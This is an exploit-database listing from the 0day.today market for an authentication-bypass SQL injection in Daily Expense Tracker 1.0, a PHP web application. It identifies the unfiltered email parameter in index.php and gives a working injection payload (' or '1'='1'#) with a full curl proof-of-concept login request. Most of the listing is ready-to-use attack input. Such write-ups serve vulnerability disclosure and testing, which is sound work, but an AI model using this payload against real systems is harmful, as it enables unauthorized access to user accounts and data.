[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Daily Expense Tracker 1.0 SQL Injection Vulnerability

Author
gh1mau
Risk
[
Security Risk High
]
0day-ID
0day-ID-34712
Category
web applications
Date add
20-07-2020
Platform
php
# Exploit Title: Daily Expense Tracker 1.0 - Authentication Bypass
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10013
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
/index.php


Vulnerable Code:
-----------------
line 8: $email=$_POST['email'];


Vulnerable Issue:
-----------------
$email=$_POST['email']; is not filtered correcty on the server side


Payload:
--------
'email=saya%40saya.com' or '1'='1'#&password=1234&login=login'


Sample POC Request:
-------------------

curl -i -s -k --location --request POST 'http://localhost/dets/' \
--header 'Origin: http://localhost:88' \
--header 'Cookie: PHPSESSID=dht4cn59hq6020vulephs36qr5' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' \
--header 'Referer: http://localhost:88/dets/' \
--header 'Connection: close' \
--header 'Sec-Fetch-Site: same-origin' \
--header 'Sec-Fetch-Dest: document' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Sec-Fetch-Mode: navigate' \
--header 'Cache-Control: max-age=0' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Sec-Fetch-User: ?1' \
--header 'Accept-Language: en-US,en;q=0.9' \
--header 'Content-Length: 60' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'email=saya%40saya.com' or '1'='1'#&password=1234&login=login'

#  0day.today [2024-11-15]  #